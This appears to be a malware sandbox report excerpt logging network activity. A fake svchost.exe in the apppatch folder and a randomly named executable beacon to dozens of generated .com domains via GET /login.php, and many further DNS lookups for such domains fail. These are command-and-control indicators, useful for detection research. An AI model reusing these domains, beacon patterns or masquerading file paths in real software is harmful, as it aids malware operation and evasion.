Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupydeq.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygynud.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: pupycag.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qexyhuv.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galynuh.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyciz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?sub1=20241112-0407-4817-b30f-e9d3a3931519 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731344868.1504633
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0407-4879-ab0a-fce34aca034a HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731344868.1489616
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyhyg.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lygyvuj.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyhiz.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: puzylyp.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyvyxor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gadyniw.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gahyqah.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyrysor.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyvan.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lyxynyx.com Cookie: __tad=1731344868.1489616
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vofycot.com Cookie: __tad=1731344868.1504633
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyval.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php?subid1=20241112-0408-095b-a6b9-e37a1a5effa6 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww25.lyxynyx.com Connection: Keep-Alive Cookie: __tad=1731344868.1489616; parking_session=07951af7-1a60-440f-a856-c66b7de487f9
Source: HTTP traffic: GET /login.php?sub1=20241112-0408-09d4-8f1c-1de8890559b5 HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: ww16.vofycot.com Connection: Keep-Alive Cookie: __tad=1731344868.1504633
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyhub.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=910vr4788904590031611
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Cookie: parking_session=a5a88ea0-36a7-4e4e-8f60-5d1139b1df65
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qetyfuv.com Cookie: snkz=66.23.206.109; btst=1885748a88d570f6bc1d4997b747b719|66.23.206.109|1731344858|1731344858|0|1|0
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Cookie: vsid=910vr4788904590031611
Source: C:\Program Files (x86)\rmhwtcqcZJzJoZpTeIobOfwAauRQPZnWpOdZODInSqkFSwaDcOmEgXQ\ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Cookie: snkz=66.23.206.109; btst=efdffc983bdd66cc7891294af6cfad3b|66.23.206.109|1731344858|1731344858|0|1|0
Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
Source: unknownDNS traffic detected: query: puvybeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyxip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujydag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonybat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopymyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopygat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyrys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojybek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyvar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexytep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyviw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyquz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzylol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyquf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymytar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymytux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetykol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocygyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysynaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedytul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujywiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyrov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyqim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufycol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyner.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyqaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumylel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufytev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyrac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebykul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupybul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyfaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyxux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyzez.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyxup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymywaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrynad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyxur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyroh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyhuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyciq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyrym.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyzaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysylej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galynab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofypuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyqis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqynel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymysud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryxuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyzeb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purybav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volygyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqylyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyxep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyvop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzywel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyvav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupylaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyteg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzymig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyjav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytan.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvymir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galydoz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygysij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyboq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyfad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyjox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyxex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyfew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujycov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purymuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyjuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetynev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxygud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetysuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrywax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjad.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyged.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyfil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyraw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyjuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygymyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypiz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganynyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyguj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galykes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojypuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocykif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganykuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvywav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedykiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyzyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygylax.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyger.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekylag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvynen.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyquk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqug.com replaycode: Name error (3)
